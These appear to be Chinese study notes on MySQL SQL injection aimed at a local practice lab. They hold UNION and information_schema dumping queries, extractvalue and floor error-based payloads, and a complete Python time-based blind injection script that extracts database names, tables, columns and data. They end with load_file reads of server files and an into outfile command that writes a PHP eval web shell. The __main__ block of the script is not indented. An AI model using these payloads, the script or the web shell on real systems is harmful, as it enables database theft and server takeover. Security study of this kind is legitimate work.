目录
十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)
经验:
在 URL 中注入时需要提前做 URL 编码：# 会被浏览器当作片段分隔符而不发送到服务器，
如 # -> %23；空格可写成 + 或 %20，否则注释符 -- 后面要求的空格会丢失。
一.通过 1' #判断是字符型还是数字型
字符型:select * from user where id = '$'
数字型:select * from user where id = $
报错的是 数字型
select * from user where id = 1' #
不报错的是字符型
select * from user where id = '1' #
还有可能需要 1') # 来判断参数有没有括号 引申为
1'))# 1')))# 1"))# 1")))#
注释符除了 # 也可以用 --+（MySQL 要求 -- 后面紧跟一个空格，URL 中的 + 解码后正好是空格）
二. 查看返回列
order by 1,2,3... 逐步增大直到报错，最后一个不报错的数字就是列数
union select 1,2,3... 的列数必须与原查询相同，页面上回显出来的数字就是可以替换成子查询的位置
三.查数据库名
select database()
四.查表名
select group_concat(table_name) from information_schema.tables where table_schema = database();database() 可以用 '查到的数据库名' 替代
五.查列名
select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '$';
六.查数据
select group_concat($1) from $2   ($1 为列名，$2 为表名；不是当前库时写成 库名.表名)
多列一起取可以写 group_concat($1,0x3a,$3)，用 0x3a 即 ':' 作为分隔符
七.报错注入常用的两个函数
extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
#extractvalue 的报错信息只回显前 32 个字符，超长时用 substr 分段截取；extractvalue 里的子查询必须带括号写成 (select flag from flag)，不能直接写 select flag from flag
select * from news where id=1 and (extractvalue(1,concat(0x7e,substr((select flag from flag),21,40),0x7e)));
floor()（利用 rand(0) 与 group by 冲突产生主键重复报错，被 group by 的表至少要有 3 行，information_schema.tables 一定满足）
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
几个小案例:
原句:select ? from user where id = $
-> select ? from user where id = 1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()#
//在输入框中就用#,别用--+;因为这里的+不会被解析成空格
//在url栏用--+或者%23,因为#需要被编译为%23才能被识别
时间盲注Python脚本:
"""
使用说明
database_length = database_length() 返回数据库的长度
database_name(a) 传入数据库长度,返回数据库的名字
table_count() 输出表的数量
table_length = table_length() 返回表的长度
table_name(length) 传入表的长度,输出所有表的名字
column_length = column_length() 传入单个表的名字,查询单个表下的列长度
column_name(column_length,table_name) 传入表名,列长度,查询所有列名
flag_length(table_name,column_name) 传入表名,列名,返回数据长度
flag_name(table_name,column_name,flag_length) 传入表名,列名,数据长度,返回数据的值
"""
'''
语法总结:
if($,1,2) $为true,输出1,否则输出2
substr(string,count1,count2) 从count1的位置开始,截取count2个字符 如 substr(string,1,1) == s
ascii(char) 将char转化为ascii码 如 ascii(A) == 65
length(string) 返回字符串长度
database() 返回数据库名字
'''
import requests
import time
base_url="http://127.0.0.1:80/Less-6/?id="
passtime=2
#数据库名的长度
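def database_length(max_len=45):
    """Recover the length of the current database name via time-based blind injection.

    For each candidate length ``i`` one request is sent whose SQL ``if()`` calls
    ``sleep(passtime)`` only when ``length(database())`` equals ``i``; the first
    candidate whose round-trip exceeds ``passtime`` is taken as the answer.

    NOTE: this helper injects with a double-quote prefix (``1"``, sqli-labs
    Less-6 style) while the other helpers in this file use ``1'``; use the
    prefix that matches the target's quoting.

    Args:
        max_len: largest length tried (exclusive).  Candidates start at 1
            because a database name can never be empty.

    Returns:
        The detected length, or ``None`` when no candidate below ``max_len``
        matched (the original silently fell off the loop and returned ``None``).
    """
    for i in range(1, max_len):
        # ".format" binds tighter than "%", so {} gets i and %s gets passtime.
        # The trailing "--+" decodes to "-- " and comments out the rest of the query.
        url = base_url + "1\" and if( length(database())={} , sleep(%s) ,1) --+ ".format(i) % passtime
        start = time.perf_counter()
        # A hard timeout keeps a dead target from hanging the scan forever; it is
        # well above passtime so a genuine sleep() is never cut short.
        requests.get(url, timeout=passtime * 10)
        elapsed = time.perf_counter() - start
        if elapsed > passtime:  # the true branch slept -> this length matched
            print("database_length->", i)
            return i
    print("database_length-> no match below", max_len)
    return None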
#数据库长度是4
#查数据库的名字
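def database_name(length_database):
    """Recover the current database name one character at a time (time-based blind).

    For each position ``i`` in ``1..length_database`` every printable ASCII
    code 33..126 is tried; the request whose ``if()`` slept (round-trip above
    ``passtime``) reveals that character.  Uses the ``1'`` single-quote prefix.

    Args:
        length_database: name length, e.g. as returned by ``database_length()``.

    Returns:
        The recovered name (also printed).  A position where no candidate
        matched is skipped, so a result shorter than ``length_database``
        indicates a miss (timing jitter, or a character outside 33..126).
    """
    result = ""
    for i in range(1, length_database + 1):  # MySQL substr() positions are 1-based
        for j in range(33, 127):  # printable ASCII, '~' (126) included
            url = base_url + "1' and if(ascii(substr(database(),{},1))={},sleep({}),1) --+ ".format(i, j, passtime)
            start = time.perf_counter()
            # Timeout well above passtime: never cuts a genuine sleep() short.
            requests.get(url, timeout=passtime * 10)
            if time.perf_counter() - start > passtime:
                result += chr(j)
                break  # one character per position; move to the next one
    print("database_name->result:", result)
    return result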
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
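def table_count(max_count=200):
    """Count the tables in the current database via time-based blind injection.

    Candidate counts ``0, 1, 2, ...`` are tried in turn; the request whose
    ``if()`` slept reveals the real ``count(*)``.

    Args:
        max_count: largest count tried (exclusive).  The original looped
            forever when nothing matched; this bound makes that a clean miss.

    Returns:
        The detected count, or ``None`` if no candidate below ``max_count``
        matched.
    """
    url = base_url + "1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(%s),1) --+" % passtime
    for i in range(0, max_count):
        real_url = url.format(i)
        start = time.perf_counter()
        # Timeout well above passtime: never cuts a genuine sleep() short.
        requests.get(real_url, timeout=passtime * 10)
        if time.perf_counter() - start > passtime:
            print("table_count()->result:", i)
            return i
    print("table_count()-> no match below", max_count)
    return None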
#两张表
#跑 表名长度
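def table_length(max_len=1025):
    """Measure the length of all table names joined by group_concat (time-based blind).

    The payload is ``length((select group_concat(table_name) ...))``; candidate
    lengths ``0, 1, 2, ...`` are tried until the ``if()`` sleeps.

    Args:
        max_len: largest length tried (exclusive).  Defaults just past 1024,
            MySQL's default ``group_concat_max_len``: the joined string is
            silently truncated there, so longer results cannot be observed anyway.

    Returns:
        The detected length, or ``None`` if nothing matched below ``max_len``
        (the original looped forever in that case).
    """
    url = base_url + "1' and if( length( (select group_concat(table_name) from information_schema.tables where table_schema = database()) )={},sleep(%s),1) --+" % passtime
    for i in range(0, max_len):
        real_url = url.format(i)
        start = time.perf_counter()
        # Timeout well above passtime: never cuts a genuine sleep() short.
        requests.get(real_url, timeout=passtime * 10)
        if time.perf_counter() - start > passtime:
            print("table_length()->result:", i)
            return i
    print("table_length()-> no match below", max_len)
    return None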
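def table_name(table_length):
    """Recover the group_concat-joined table names character by character.

    For each position ``1..table_length`` every printable ASCII code 33..126 is
    tried against ``ascii(substr((select group_concat(table_name) ...), i, 1))``;
    the request that slept reveals the character.  Table names come back
    comma-separated, exactly as group_concat joins them.

    Args:
        table_length: joined-string length, e.g. from ``table_length()``.

    Returns:
        The recovered string (progress is printed after each character).  A
        position with no match is skipped rather than padded.
    """
    url = base_url + "1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(%s),1) --+" % passtime
    result = ""
    for i in range(1, table_length + 1):  # substr() positions are 1-based
        for j in range(33, 127):
            real_url = url.format(i, j)
            start = time.perf_counter()
            # Timeout well above passtime: never cuts a genuine sleep() short.
            requests.get(real_url, timeout=passtime * 10)
            if time.perf_counter() - start > passtime:
                result += chr(j)
                print("table_name->result:", result)
                break
    return result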
#字段和表名一样,先跑长度后跑具体字符
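def column_length(table_name, max_len=1025):
    """Measure the length of a table's group_concat-joined column names.

    Args:
        table_name: table to inspect; it is interpolated inside single quotes in
            the payload, so it must not itself contain a quote.  This is an
            operator-supplied value, not untrusted input.
        max_len: largest length tried (exclusive); defaults just past MySQL's
            default ``group_concat_max_len`` of 1024, beyond which the joined
            string is truncated.

    Returns:
        The detected length, or ``None`` if nothing matched below ``max_len``.
        The original only printed the value (and looped forever on a miss),
        although ``__main__`` assigns its result.
    """
    url = base_url + "1' and if( length( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) )={},sleep({}),3) --+ "
    for i in range(0, max_len):
        real_url = url.format(table_name, i, passtime)
        start = time.perf_counter()
        # Timeout well above passtime: never cuts a genuine sleep() short.
        requests.get(real_url, timeout=passtime * 10)
        if time.perf_counter() - start > passtime:
            print("column_length->result:", i)
            return i
    print("column_length-> no match below", max_len)
    return None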
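def column_name(column_length, table_name):
    """Recover a table's group_concat-joined column names character by character.

    Fixes two defects of the original: the payload hard-coded
    ``table_name='users'`` and ignored the ``table_name`` argument, and the
    inner loop did not ``break`` after a hit, so every remaining candidate was
    still requested (and a second jittery hit could append a spurious character).

    Args:
        column_length: joined-string length, e.g. from ``column_length()``.
        table_name: table whose columns are read; interpolated inside single
            quotes, so it must not contain a quote.

    Returns:
        The recovered comma-separated column names (also printed).
    """
    url = base_url + "1' and if( ascii( substr( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) , {} ,1 ) )={} , sleep({}) , 1) --+"
    result = ""
    for i in range(1, column_length + 1):  # substr() positions are 1-based
        for j in range(33, 127):
            real_url = url.format(table_name, i, j, passtime)
            start = time.perf_counter()
            # Timeout well above passtime: never cuts a genuine sleep() short.
            requests.get(real_url, timeout=passtime * 10)
            if time.perf_counter() - start > passtime:
                result += chr(j)
                print("column_name->result", result)
                break  # one character per position
    print("column_name->result", result)
    return result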
#查数据:长度,具体字母
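def flag_length(table_name, column_name, max_len=1025):
    """Measure the length of one column's values joined by group_concat.

    Args:
        table_name: table to read from (interpolated unquoted as an identifier).
        column_name: column to read (interpolated unquoted as an identifier).
            Both are operator-supplied; the payload is the injection itself.
        max_len: largest length tried (exclusive); defaults just past MySQL's
            default ``group_concat_max_len`` of 1024.

    Returns:
        The detected length, or ``None`` if nothing matched below ``max_len``.
        The original only printed it and looped forever on a miss.
    """
    url = base_url + "1' and if( ( length( (select group_concat({}) from {}) ) )={},sleep({}),1) --+"
    for i in range(0, max_len):
        real_url = url.format(column_name, table_name, i, passtime)
        start = time.perf_counter()
        # Timeout well above passtime: never cuts a genuine sleep() short.
        requests.get(real_url, timeout=passtime * 10)
        if time.perf_counter() - start > passtime:
            print("flag_length->result:", i)
            return i
    print("flag_length-> no match below", max_len)
    return None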
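def flag_name(table_name, column_name, flag_length):
    """Dump one column's group_concat-joined values character by character.

    Args:
        table_name: table to read from (interpolated unquoted as an identifier).
        column_name: column to read (interpolated unquoted as an identifier).
        flag_length: joined-string length, e.g. from ``flag_length()``.

    Returns:
        The recovered comma-separated values (progress is printed per character;
        the original printed only and returned nothing).
    """
    url = base_url + "1' and if( ( ( ascii( substr( ( (select group_concat({}) from {}) ),{},1) ) )={}),sleep({}),1) --+"
    result = ""
    for i in range(1, flag_length + 1):  # substr() positions are 1-based
        for j in range(33, 127):
            real_url = url.format(column_name, table_name, i, j, passtime)
            start = time.perf_counter()
            # Timeout well above passtime: never cuts a genuine sleep() short.
            requests.get(real_url, timeout=passtime * 10)
            if time.perf_counter() - start > passtime:
                result += chr(j)
                print("flag_name->%s" % column_name, result)
                break
    return result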
if __name__ == "__main__":
database_length = database_length()
#database_name(8)
#table_count() #不是必要的
#table_length = table_length()
#table_name(table_length)
#column_length = column_length("users")
#column_name(20,"users")
#flag_length("users","username")
#flag_name("users", "password", 91)
读写文件操作
前提：数据库用户具有 FILE 权限，且 secure_file_priv 没有限制目标目录（为 NULL 时完全禁止读写文件，为某个目录时只能在该目录下读写）
读哪些信息?用户信息,账号,密码
select load_file(' 路径 ')
如
select load_file('d:/d.txt')
select load_file('/var/www/html/flag.php')
写什么?写一句话木马（仅限授权测试）。需要知道 Web 根目录的绝对路径，MySQL 进程要对该目录有写权限，且 into outfile 的目标文件已存在时会直接报错
select '<?php @eval($_POST[\'attack\']);?>' into outfile '/var/www/html/aaa.php';